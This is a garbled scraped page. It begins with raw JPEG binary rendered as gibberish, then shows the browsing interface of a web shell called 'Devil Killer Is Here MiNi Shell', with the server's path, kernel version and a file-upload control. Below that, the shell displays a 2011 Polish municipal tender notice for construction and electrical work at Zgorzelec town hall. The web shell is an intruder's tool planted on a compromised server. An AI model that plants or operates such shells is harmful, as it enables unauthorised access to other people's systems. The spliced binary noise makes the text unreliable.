JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110104/2547-N-2011.html

<p class="kh_header"><b>Zgorzelec: Dostosowanie infrastruktury Urzędu dla potrzeb społeczeństwa informacyjnego</b><br>
<b>Numer ogłoszenia: 2547 - 2011; data zamieszczenia: 04.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostosowanie infrastruktury Urzędu dla potrzeb społeczeństwa informacyjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane i instalacyjne przewidziane przy realizacji
adaptacji II i III piętra Urzędu Miasta Zgorzelec. 

2.   W ramach prac budowlanych związanych z adaptacją II i III piętra Urzędu Miasta  
      należy wykonać w szczególności: 
1)   wykonanie tynków wewnętrznych, 
2)   montaż przewodów wentylacyjnych, 
3)  obsadzenie kratek wentylacyjnych, 
4)	wykonanie gładzi gipsowych, 
5)	 malowanie ścian, 
6)	 wykonanie sufitów podwieszanych z wypełnieniem płytami dekoracyjnymi, 
7)	 naprawa skrzydeł drzwiowych i okiennych, 
8)	 malowanie skrzydeł drzwiowych i okiennych, 
9)	 obsadzenie parapetów drewnianych. 
10)	 wzmocnienie stropu w pomieszczeniu serwerowni. 
3.  W ramach prac instalacyjnych należy wykonać w szczególnosci:
1)	montaż opraw oświetleniowych przekazanych przez Zamawiającego,
2)	zakup i montaż opraw oświetleniowych, o których mowa w punkcie 4, 
3)	montaż szafki SK-3, 
4)	montaż klimatyzatora, 
5)	wykonanie pomiarów i sprawdzeń instalacji. 
4.   Zamawiający wymaga, by zakupione przez Wykonawcę oprawy oświetleniowe były 
o parametrach nie gorszych niż podane poniżej: 
1) oprawy oświetleniowe nastropowe  ogólnego przeznaczenia na jedną świetlówkę 
     kompaktową TC-DD o mocy 28W i 38W o oprawie kwadratowej z zaokrągleniami 
     narożników, wytwarzającej od tyłu efekt łagodnej poświaty; korpus aluminiowy, kolor 
     biały, wklęsły klosz z mlecznego poliwęglanu, układ zasilania HF elektroniczny, klasa 
     rozsyłu światła I, klasa ochrony przed porażeniem - I wg PN-EN 61140:2005, stopień 
     ochrony zapewniany przez obudowę wg PN-EN 60529:2003 wynosi IP 44, 
     ograniczenie olśnienia UGR mniejsze lub równe 22, 
 2) oprawy oświetleniowe nastropowe ogólnego przeznaczenia na dwie świetlówki T5 HE 
     o mocy 28W o oprawie prostokątnej o grubości 60mm, obudowa z blachy stalowej 
     lakierowanej na biało, statecznik elektroniczny HF, dyfuzor typ opalowy; klasa rozsyłu 
     światła I, klasa ochrony przed porażeniem - I wg PN-EN 61140:2005, stopień ochrony 
     zapewniany przez obudowę wg PN-EN 60529:2003 wynosi IP 44, ograniczenie 
     olśnienia UGR mniejszy lub równy 22, 
       3) oprawy oświetleniowe nastropowe ogólnego przeznaczenia na dwie świetlówki T5 HE 
           o mocy 28W o oprawie prostokątnej grubości 60mm, obudowa z blachy stalowej 
           lakierowanej na biało, statecznik elektroniczny HF, dyfuzor typ opalowy; klasa rozsyłu 
           światła I, klasa ochrony przed porażeniem - I wg PN-EN 61140:2005, stopień ochrony 
           zapewniany przez obudowę wg PN-EN 60529:2003 wynosi IP 20, ograniczenie 
           olśnienia UGR mniejszy lub równy 19,
       4) oprawy oświetleniowe nastropowe ogólnego przeznaczenia na jedną świetlówkę T5 
           HE o mocy 35W o oprawie prostokątnej o grubości 60mm, obudowa z blachy stalowej 
           lakierowanej na biało, statecznik elektroniczny HF, dyfuzor typ opalowy; klasa 
          
           rozsyłu światła I,  klasa ochrony przed porażeniem - I wg PN-EN 61140:2005, stopień 
           ochrony zapewniany przez odbudowę wg PN-EN 60529:2003 wynosi IP 20, 
           ograniczenie olśnienia UGR mniejszy lub równy 19, 
       5) oprawy oświetleniowe nastropowe ogólnego przeznaczenia na dwie świetlówki T5          
           E o mocy 35W o oprawie prostokątnej o grubości 60mm, obudowa z blachy stalowej 
           lakierowanej na biało, statecznik elektroniczny HF, dyfuzor typ opalowy; klasa 
           rozsyłu światła I, klasa ochrony przed porażeniem - I wg PN-EN 61140:2005, stopień 
           ochrony zapewniany przez obudowę wg PN-EN 60529:2003 wynosi IP 20, 
           ograniczenie olśnienia UGR mniejszy lub równy 19, 
       6) oprawy oświetleniowe nastropowe ogólnego przeznaczenia na dwie świetlówki T5 
           HE o mocy 54W o oprawie prostokątnej o grubości 60mm, obudowa z blachy stalowej 
           lakierowanej na biało, statecznik elektroniczny HF, dyfuzor typ opalowy; klasa 
           rozsyłu światła I, klasa ochrony przed porażeniem - I wg PN-EN 61140:2005, stopień 
           ochrony zapewniany przez obudowę wg PN-EN 60529: 2003 wynosi IP 20, 
           ograniczenie olśnienia UGR mniejszy lub równy 19. 
 
5.   Szczegółowy opis, zakres robót  oraz wymagane ilości opraw,  przy realizacji
 adaptacji II i III piętra Urzędu Miasta Zgorzelec, zostały zawarte w dokumentacji    
 projektowej składającej się z  projektu instalacji elektrycznej pomieszczeń II i III piętra  
 UM Zgorzelec, projektu wykonawczego wzmocnienia stropu w pomieszczeniu 
 serwerowni, projektu szafy okablowania  strukturalnego SK-3, informacji dot. 
 bezpieczeństwa i ochrony zdrowia na budowie, projektu budowlanego wykonawczego, 
 Specyfikacji Technicznej Wykonania i Odbioru Robót  oraz w przedmiarach 
 robót branży ogólnobudowlanej, elektrycznej i teletechnicznej - załącznik nr 9 do SIWZ. 
 
6.  Zobowiązuje się Wykonawcę do opracowania kompletnej dokumentacji 
       powykonawczej w 2-ch  egzemplarzach  i przekazanie jej Zamawiającemu,  
       wraz ze zgłoszeniem gotowości robót  budowlanych do odbioru.  
            
      W skład kompletnej dokumentacji powykonawczej wchodzą następujące
      dokumenty:
      1)  atesty i certyfikaty wbudowanych materiałów, prefabrykatów lub urządzeń
      2)  aprobaty techniczne, 
      3)  uzupełniony Dziennik Robót, 
      4)  wymagane przepisami, protokoły i zaświadczenia z przeprowadzonych przez 
           Wykonawcę badań i sprawdzeń,  
      5)  oświadczenie kierownika budowy  o zgodności wykonania obiektu budowlanego
           z projektem budowlanym, warunkami pozwolenia na budowę/lub zgłoszenia robót, 
           przepisami i obowiązującymi Polskimi Normami oraz oświadczenie kierownika 
           budowy o doprowadzeniu do należytego stanu i porządku terenu budowy,  
      6)  w  przypadku zmian nie odstępujących w sposób istotny od zatwierdzonego projektu i 
           warunków zgłoszenia robót niewymagających pozwolenia na budowę, Wykonawca  
           dołączy kopie rysunków wchodzących  w skład zatwierdzonego projektu 
           budowlanego, z naniesionymi zmianami i uzupełniającym opisem, w takim przypadku 
           oświadczenie Kierownika budowy powinno być zatwierdzone przez Projektanta i 
           Inspektora Nadzoru, 
      7)  oświadczenie kierownika budowy o wbudowaniu materiałów, na które dostarczono 
           dokumenty odbiorowe, oraz  zgodności materiałów z ST i projektem budowlanym, 
      8)  oświadczenie Inspektora Nadzoru Inwestorskiego o zgodności wykonania obiektu 
           budowlanego z projektem budowlanym, warunkami pozwolenia na budowę, 
           przepisami i obowiązującymi Polskimi Normami, 
      9) pisemną gwarancję jakości na wykonany przedmiot umowy; z treści dokumentu 
           gwarancyjnego powinno wynikać, na co jest udzielona gwarancja, jak długo 
           gwarancja obejmuje, co jest wyłączone z gwarancji, 
    10) deklarację zgodności materiałów z określeniem miejsca przeznaczenia zgodnie z 
           ustawą z dnia 16.04.2004r. o wyrobach budowlanych (Dz. U.z 2004r. Nr 92 poz. 881 z 
           późn.zm.) oraz ustawą z dnia 30.08.2002r.o systemie oceny zgodności (tekst jednolity 
           z 2010r., Dz.U. Nr 138, poz. 935), 
    11) oświadczenie właściciela nieruchomości na którym prowadzona była inwestycja o 
          przywróceniu nieruchomości do stanu pierwotnego.

7. Zobowiązuje się Wykonawcę do opracowania i przedstawienia Zamawiającemu 
    harmonogramu rzeczowego realizacji inwestycji, w terminie 7 dni od dnia podpisania 
    umowy na realizację niniejszego zamówienia. 
    Harmonogram rzeczowy realizacji inwestycji musi obejmować zakres rzeczowy robót, 
    terminy ich rozpoczęcia  i zakończenia.
          
8. Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
    odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas realizacji 
    zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. (tekst jednolity z 
    2007r. Dz. U. Nr 39, poz. 251 z późn. zm.)  i ustawą Prawo ochrony środowiska  z dnia 
    27 kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. Nr 25, poz.150 z późn. zm.). 

 9. Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów
     zgodnie z powszechnie obowiązującymi przepisami.  
      
10.Przed przystąpieniem do w/w robót Wykonawca winien   dokonać wizji lokalnej terenu, 
     objętego robotą budowlaną, celem zapoznania się z warunkami realizacji przedmiotu 
     zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny. 

11.Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie z 
     dokumentacją projektową,  technologią wskazaną przez Projektanta, zgodnie z zasadami 
     wiedzy  technicznej, normami,  wskazaniami Zamawiającego, oraz obowiązującymi   
     przepisami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.23.24.60-4, 45.31.00.00-3, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców wniesienia wadium w wysokości 9 656,00 zł. PLN 
    (słownie: dziewięć tysięcy sześćset pięćdziesiąt sześć zł.)
2. Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert. 
    Wadium musi być na koncie Zamawiającego przed upływem terminu składania 
    ofert.  
3. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
    przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 
    ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie 
    wykluczony z postępowania o udzielenie zamówienia, a oferta Wykonawcy 
    wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp.
4. W zależności od woli wykonawcy wadium może być wnoszone w następujących  
        formach:
1)	pieniądzu,
        2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        3)   gwarancjach bankowych,
        4)   gwarancjach ubezpieczeniowych,
        5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
              ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
              Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy 
Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli 
Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 
ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 
ust. 1, lub pełnomocnictw.  

5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
    O/Zgorzelec.
    Na przelewie należy  umieścić informację :
    Wadium na Dostosowanie infrastruktury Urzędu dla potrzeb społeczeństwa 
    informacyjnego
6. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
    najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, 
    którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 12.    
7. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
    zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego 
      oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
8.   Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
      ofertę przed  upływem terminu składania ofert. 
9.   Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
      zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
      ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako 
      najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
      Zamawiającego. 
10. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
      wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
      pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
      za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta  została wybrana :
      a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie, 
      b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
      c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn   leżących  po stronie wykonawcy.
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
     odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
     dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, chyba 
     że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
    metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
    dokumenty i oświadczenia  wymienione w pkt.11 i 12 SIWZ. 
2/ Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
    spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3/ Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał: 
1) dwie roboty budowlane polegające  na budowie lub  modernizacji  instalacji  
     elektrycznej wewnętrznej o łącznej wartości brutto min. 250 000,00zł.    
2)  dwie  roboty budowlane polegające na wykonaniu prac remontowo-
     wykończeniowych w obiektach o kubaturze nie mniejszej niż 2000 m3 , o 
     łącznej wartości brutto min. 320 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
     dokumenty i oświadczenia.  
2)  Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3)  Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4) Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje: 
     1) min.  1 osobą, która będzie wykonywać zamówienie,  posiadającą           
   prawo wykonywania samodzielnych funkcji technicznych w budownictwie do 
   kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie 
   sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, wraz z 
   informacją   Wykonawcy o podstawie do dysponowania tą osobą, 
      
     2) min. 1 osobą, która będzie wykonywać zamówienie, posiadającą prawo 
   wykonywania samodzielnych funkcji technicznych w budownictwie do 
   kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, 
   wraz z informacją Wykonawcy o podstawie do dysponowania ta osobą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
1)  wypełniony i podpisany formularz Oferta (wg. załączonego wzoru), 
2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
     (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
      konsorcjum), 
3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
      zamówień   publicznych - załącznik nr 2 do SIWZ, 
      Powyższe oświadczenie, Wykonawca składa w przypadku gdy  zamierza 
      powierzyć do wykonania  części zamówienia, 
4) kosztorys ofertowy sporządzony metodą uproszczoną, wraz z zestawieniami 
    (tabelami),  opisami robót budowlanych zgodnie z załączonym do SIWZ przedmiarem 
     robót.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym 
 warunki takiej zmiany Zamawiający określił  w § 12 ust. 2  projektu umowy. 
 1. Zakres przewidzianych zmian: 
     1) Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
         realizację umowy, o których mowa w § 11 projektu umowy, możliwa będzie w 
         każdym czasie w trakcie związania umową, pod warunkiem że osoby te posiadać 
         będą co najmniej takie same uprawnienia jak osoby wskazane przez Wykonawcę w 
         ofercie. 
     2) Zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych 
         przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót 
